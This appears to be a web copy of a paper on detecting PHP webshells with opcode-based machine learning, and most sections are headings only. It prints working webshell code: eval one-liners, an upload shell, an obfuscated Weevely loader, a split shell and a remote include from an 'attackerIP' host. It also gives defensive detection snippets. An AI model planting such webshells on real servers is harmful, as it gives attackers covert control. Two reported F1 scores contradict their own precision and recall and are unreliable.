Mitigating Webshell Attacks through Machine Learning Techniques
Abstract
1. Introduction
2. Background
2.1. Webshell
2.2. Webshell Classification
- Simple Webshell: A simple webshell consists of a single line of code. It accepts the data the attacker submits through the client and performs the corresponding operations. It is the most common form of webshell. A webshell written in PHP is shown in Listing 1.
Listing 1: Simple Webshell.
<?php @eval($_POST["a"]); ?>
In this example, the attacker sends an HTTP POST request, passes the code to execute through parameter “a”, and runs it with PHP's “eval” construct. The parameter “a” is also called the password of the webshell.
- Upload Function Webshell: The upload webshell serves as a springboard for installing multi-function webshell files. Websites usually restrict the size or type of uploaded files, so the attacker first uploads this small webshell and then uses it to upload a multi-function webshell. The key code of the upload webshell is shown in Listing 2.
Listing 2: Upload Function Webshell.
<?php
if (isset($_POST["upload"])) {
    // Write attacker-supplied content to an attacker-chosen path.
    @file_put_contents($_POST["path"], $_POST["content"]);
}
?>
This webshell can write new files to a specified directory, which helps the attacker maintain covert control.
- Multi-Functional Webshell: The multi-function webshell is usually large and feature-rich. It provides functions such as file operations, port scanning, command execution, and database operations. Because of its size, it is usually uploaded to the victim's server through the upload function webshell.
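The simple forms above are easy to catch, and they are also easy to disguise. The minimal Python sketch below shows a naive signature check. The SIGNATURES list and the naive_scan function are hypothetical illustrations, not a real detector. Each rule flags a code-execution or file-write sink whose argument is read directly from a request superglobal.

```python
import re

# Hypothetical rules: a dangerous PHP sink whose first argument comes
# straight from a request superglobal such as $_POST or $_GET.
SIGNATURES = [
    re.compile(r"\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.IGNORECASE),
    re.compile(r"\bfile_put_contents\s*\(\s*\$_(POST|GET|REQUEST)\b", re.IGNORECASE),
]


def naive_scan(source: str) -> bool:
    """Return True if any signature matches the PHP source text."""
    return any(sig.search(source) for sig in SIGNATURES)


listing1 = '<?php @eval($_POST["a"]); ?>'
listing2 = ('<?php if(isset($_POST["upload"])){'
            '@file_put_contents($_POST["path"],$_POST["content"]); } ?>')
benign = '<?php echo htmlspecialchars($_GET["name"]); ?>'
variable_call = '<?php @$_POST["0"]($_POST["1"]); ?>'  # function name chosen at run time

for name, src in [("listing1", listing1), ("listing2", listing2),
                  ("benign", benign), ("variable_call", variable_call)]:
    print(name, naive_scan(src))
```

The last sample is missed because no dangerous function name appears in the source text. The obfuscation techniques in Section 4 exploit exactly this kind of weakness.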
2.3. Machine Learning
- Supervised Learning: The samples in the training set are labeled; that is, the class of each sample is known. The model learns the implicit knowledge in the data and predicts the labels of unseen samples. Typical supervised learning algorithms include k-nearest neighbors, support vector machines (SVMs), naïve Bayes, and decision trees. This work combines webshell detection with machine learning algorithms. Each webshell file is labeled during training, so the data is supervised, and this work therefore mainly studies these classification algorithms.
- Unsupervised Learning: The samples in the training set are unlabeled; that is, the class of each sample is unknown. A common example is cluster analysis. During training, the model summarizes implicit category information from the data. Unsupervised learning is often used to preprocess unlabeled data before a supervised model is trained.
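As a concrete instance of the supervised setting, the following Python sketch trains a multinomial naïve Bayes classifier with Laplace smoothing on a few labeled token sequences. It then predicts labels for unseen sequences. The opcode-like training sequences are invented toy data, and train_nb and predict_nb are hypothetical helper names.

```python
import math
from collections import Counter


def train_nb(docs, labels, alpha=1.0):
    """Fit a multinomial naive Bayes model with additive (Laplace) smoothing.

    docs: list of token lists; labels: one class name per document.
    """
    vocab = {tok for doc in docs for tok in doc}
    log_priors, log_likelihoods = {}, {}
    for c in set(labels):
        class_docs = [d for d, y in zip(docs, labels) if y == c]
        log_priors[c] = math.log(len(class_docs) / len(docs))
        counts = Counter(tok for d in class_docs for tok in d)
        denom = sum(counts.values()) + alpha * len(vocab)
        log_likelihoods[c] = {t: math.log((counts[t] + alpha) / denom) for t in vocab}
    return log_priors, log_likelihoods, vocab


def predict_nb(model, doc):
    """Return the class with the highest posterior log-probability."""
    log_priors, log_likelihoods, vocab = model
    scores = {
        # Tokens never seen in training are ignored.
        c: log_priors[c] + sum(log_likelihoods[c][t] for t in doc if t in vocab)
        for c in log_priors
    }
    return max(scores, key=scores.get)


# Toy labeled data, invented for illustration.
train_docs = [
    ["FETCH_R", "FETCH_DIM_R", "INCLUDE_OR_EVAL", "RETURN"],
    ["FETCH_R", "FETCH_DIM_R", "FETCH_R", "FETCH_DIM_R", "INCLUDE_OR_EVAL", "RETURN"],
    ["ASSIGN", "CONCAT", "ECHO", "RETURN"],
    ["ASSIGN", "ECHO", "ECHO", "RETURN"],
]
train_labels = ["webshell", "webshell", "normal", "normal"]
model = train_nb(train_docs, train_labels)

print(predict_nb(model, ["FETCH_R", "FETCH_DIM_R", "INCLUDE_OR_EVAL", "RETURN"]))
print(predict_nb(model, ["ASSIGN", "ECHO", "RETURN"]))
```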
3. Literature on Detection Methods
3.1. Static and Dynamic Detection
3.2. Flow Analysis Detection
3.3. Log Analysis Detection
3.4. Behavior Analysis Detection
3.5. Statistical Analysis
4. Threats
4.1. Plain Webshell
Listing 3: Non-Obfuscated Webshells.
<?php
// Example 1
@eval($_POST["passwd"]); // The 1st parameter is the code to execute.
// Example 2
@$_POST["0"]($_POST["1"]); // The 1st parameter names the function to call; the 2nd is its argument.
?>
4.2. Obfuscated Webshell
Listing 4: Webshell obfuscation (the Weevely webshell).
<?php
$fo = "UE9";
$bp = "TVFt4e";
$jsh = "HqhdKTsKCqg==";
$un = str_replace("b", "", "bsbtbrb_brbepblbabcbe");          // "str_replace"
$bf = "CkqBldqmFsKCRf";
$clh = $un("y", "", "ybyasyey64y_ydyeycyodye");              // "base64_decode"
$nbg = $un("ev", "", "evcevreateve_evfevuevncevtievon");     // "create_function"
$ze = $nbg('', $clh($un("q", "", $bf.$fo.$bp.$jsh)));         // build function from decoded payload
$ze();
?>
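The Weevely-style obfuscation can be undone by hand. This Python sketch replays the string operations of Listing 4 on its literals, assuming they are reproduced exactly as printed. Python's str.replace stands in for PHP's str_replace, and base64.b64decode stands in for base64_decode.

```python
import base64

# Literals copied from Listing 4.
fo, bp, jsh, bf = "UE9", "TVFt4e", "HqhdKTsKCqg==", "CkqBldqmFsKCRf"

# Function names are hidden by interleaving filler characters;
# PHP's str_replace(search, "", subject) is mirrored by str.replace.
un = "bsbtbrb_brbepblbabcbe".replace("b", "")               # -> str_replace
clh = "ybyasyey64y_ydyeycyodye".replace("y", "")           # -> base64_decode
nbg = "evcevreateve_evfevuevncevtievon".replace("ev", "")  # -> create_function

# The payload is base64 text split across four variables and padded with "q".
payload_b64 = (bf + fo + bp + jsh).replace("q", "")
payload = base64.b64decode(payload_b64).decode("ascii")

# In PHP, $nbg('', payload) builds an anonymous function and $ze() runs it.
print(un, clh, nbg)
print(payload.strip())
```

Once decoded, the payload is the familiar one-line pattern `@eval($_POST[xxx]);`. The obfuscation changes only how the code looks in the source file.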
4.3. Split Webshell
Listing 5: Split Webshell.
<?php
function func() {
    return "ev"."al";
}
$a = func();
$a(${"_PO"."ST"}["passwd"]);
?>
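The split webshell hides keywords by building them at run time. As a hedged illustration, the Python sketch below folds adjacent double-quoted string literals that are joined by PHP's "." operator. fold_concatenations is a hypothetical helper. It assumes literals without escaped quotes and is not a PHP parser.

```python
import re

# Two double-quoted PHP literals joined by the "." operator, e.g. "ev"."al".
# Simplification: literals must not contain quotes or backslashes.
CONCAT = re.compile(r'"([^"\\]*)"\s*\.\s*"([^"\\]*)"')


def fold_concatenations(php_source: str) -> str:
    """Merge literal concatenations until the text stops changing."""
    previous = None
    while previous != php_source:
        previous = php_source
        php_source = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', php_source)
    return php_source


listing5 = '''<?php
function func() {
    return "ev"."al";
}
$a = func();
$a(${"_PO"."ST"}["passwd"]);
?>'''

print(fold_concatenations(listing5))
```

After folding, "eval" and "_POST" reappear as literals. The call itself is still made through the variable $a, so a source-level rule would also need to track data flow. This is part of the motivation, given in Section 5, for working with opcode sequences instead of source text.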
4.4. Remote Webshell
Listing 6: Remote Webshell Example.
<?php
$filename = $_GET['page'];
include($filename);
?>
Listing 7: Webshell Path.
http://VictimIP//index.php?page=http://attackerIP/webshell.txt
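The remote webshell arrives through a request parameter, so a log-side check can look for query values that are themselves remote URLs. The Python sketch below uses urllib.parse from the standard library. REMOTE_SCHEMES and remote_include_params are assumptions for illustration. Whether PHP actually fetches such a URL depends on its configuration, for example the allow_url_include setting.

```python
from urllib.parse import urlparse, parse_qs

# Assumed list of schemes that would make include() load code from elsewhere.
REMOTE_SCHEMES = {"http", "https", "ftp"}


def remote_include_params(request_url: str) -> dict:
    """Return query parameters whose value looks like a remote URL."""
    query = parse_qs(urlparse(request_url).query)
    return {
        name: value
        for name, values in query.items()
        for value in values
        if urlparse(value).scheme.lower() in REMOTE_SCHEMES
    }


print(remote_include_params("http://VictimIP//index.php?page=http://attackerIP/webshell.txt"))
print(remote_include_params("http://VictimIP/index.php?page=about"))
```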
5. Proposed Solution
- To reduce the interference of webshell obfuscation and encryption with detection, file detection is transformed into the detection of opcode sequences.
- To extract word frequency features from opcode sequences using a TF-IDF model.
- To apply different machine learning algorithms to this binary classification problem (webshell versus normal page).
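The TF-IDF step can be sketched in a few lines of Python. This sketch uses the textbook weighting tf(t, d) * log(N / df(t)), where tf is the count of opcode t in document d divided by the length of d. Libraries differ in the details: scikit-learn's TfidfVectorizer, for instance, smooths the IDF and L2-normalizes each row by default. The optional max_features argument mirrors the common practice of keeping only the most frequent terms across the corpus. The function name and toy sequences are hypothetical.

```python
import math
from collections import Counter


def tfidf(docs, max_features=None):
    """Return (vocabulary, TF-IDF vectors) for a list of token lists.

    Weight of term t in document d: (count of t in d / len(d)) * log(N / df(t)).
    If max_features is set, only the most frequent terms across the whole
    corpus are kept (ties keep first-seen order).
    """
    n_docs = len(docs)
    corpus_counts = Counter(t for d in docs for t in d)
    vocab = [t for t, _ in corpus_counts.most_common(max_features)]
    df = {t: sum(1 for d in docs if t in d) for t in vocab}
    vectors = []
    for d in docs:
        counts = Counter(d)
        vectors.append([counts[t] / len(d) * math.log(n_docs / df[t]) for t in vocab])
    return vocab, vectors


# Toy opcode documents (hypothetical).
docs = [
    ["FETCH_CONSTANT", "FETCH_R", "FETCH_DIM_R", "INCLUDE_OR_EVAL", "RETURN"],
    ["ASSIGN", "ECHO", "RETURN"],
]
vocab, vectors = tfidf(docs)
for term, weight in zip(vocab, vectors[0]):
    print(f"{term:16s} {weight:.4f}")
```

RETURN occurs in every document, so its IDF, and therefore its weight, is zero. INCLUDE_OR_EVAL occurs only in the first document and receives 0.2 × ln 2 ≈ 0.139.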
5.1. Opcode
<?php eval($_POST[CMD]); ?>
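Once a disassembler such as the VLD extension has produced the opcodes, each file can be treated as a text document whose words are opcodes. The Python sketch below starts from the five-opcode sequence listed in this article's opcode table for the one-liner above and joins it into a document. It also derives opcode bigrams, one optional way to keep some ordering information. opcode_ngrams is a hypothetical helper, and the bigram step is an assumption rather than something this section describes.

```python
def opcode_ngrams(opcodes, n=2):
    """Return every run of n consecutive opcodes as a tuple."""
    return [tuple(opcodes[i:i + n]) for i in range(len(opcodes) - n + 1)]


# Opcode sequence as listed in the opcode table of this article.
sequence = ["FETCH_CONSTANT", "FETCH_R", "FETCH_DIM_R", "INCLUDE_OR_EVAL", "RETURN"]
document = " ".join(sequence)  # one "sentence" of opcode words
bigrams = opcode_ngrams(sequence, n=2)

print(document)
print(bigrams)
```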
5.2. Data Preprocessing
5.3. Feature Extraction and Representation
5.4. Word Bag and TF-IDF Models
5.5. Model Training and Validation
6. Evaluation
6.1. Experiments
6.2. Impact of Max_Features Value on Results
6.3. Effectiveness of the Approach
7. Conclusions and Future Work
Author Contributions
Funding
Conflicts of Interest
# | OPCODE |
---|---|
1 | FETCH_CONSTANT |
2 | FETCH_R |
3 | FETCH_DIM_R |
4 | INCLUDE_OR_EVAL |
5 | RETURN |
True Class | Predicted: Webshell | Predicted: Normal Page |
---|---|---|
Webshell | True Positive (TP) | False Negative (FN) |
Normal Page | False Positive (FP) | True Negative (TN) |
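The metrics reported in the results tables follow from the four cells of this confusion matrix. The minimal Python sketch below computes them; the counts in the usage line are invented and are not taken from the article's experiments.

```python
def classification_metrics(tp, fp, fn, tn):
    """Return (accuracy, precision, recall, F1) as fractions in [0, 1]."""
    accuracy = (tp + tn) / (tp + fp + fn + tn)
    precision = tp / (tp + fp)  # share of files flagged as webshells that really are
    recall = tp / (tp + fn)     # share of real webshells that were flagged
    f1 = 2 * precision * recall / (precision + recall)  # harmonic mean
    return accuracy, precision, recall, f1


# Hypothetical counts for illustration only.
acc, prec, rec, f1 = classification_metrics(tp=90, fp=10, fn=5, tn=95)
print(f"accuracy={acc:.3f} precision={prec:.3f} recall={rec:.3f} f1={f1:.3f}")
```

The same harmonic mean can be applied to reported percentages. For example, the NB-Opcode row gives 2 × 97.2 × 96.8 / (97.2 + 96.8) ≈ 97.0.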
Method | Accuracy (%) | Precision (%) | Recall (%) | F1 Score (%) |
---|---|---|---|---|
NB-Opcode | 97.4 | 97.2 | 96.8 | 97.0 |
SVM | 96.0 | 94.1 | 95.9 | 95.9 |
RF | 96.1 | 89.0 | 88.2 | 88.6 |
Detector | Version | Accuracy (%) | Precision (%) | Recall (%) | F1 Score (%) |
---|---|---|---|---|---|
NB-Opcode | - | 97.4 | 97.2 | 96.8 | 97.0 |
Webshell Killer | V2.10 | 88.6 | 85.9 | 80.3 | 83.0 |
D-Shield | V2.1.5.2 | 92.4 | 87.9 | 90.6 | 89.2 |
Web Shell Detector | V1.1 (Python) | 84.6 | 68.2 | 77.4 | 75.5 |
© 2020 by the authors. Licensee MDPI, Basel, Switzerland. This article is an open access article distributed under the terms and conditions of the Creative Commons Attribution (CC BY) license (http://creativecommons.org/licenses/by/4.0/).
Guo, Y.; Marco-Gisbert, H.; Keir, P. Mitigating Webshell Attacks through Machine Learning Techniques. Future Internet 2020, 12, 12. https://doi.org/10.3390/fi12010012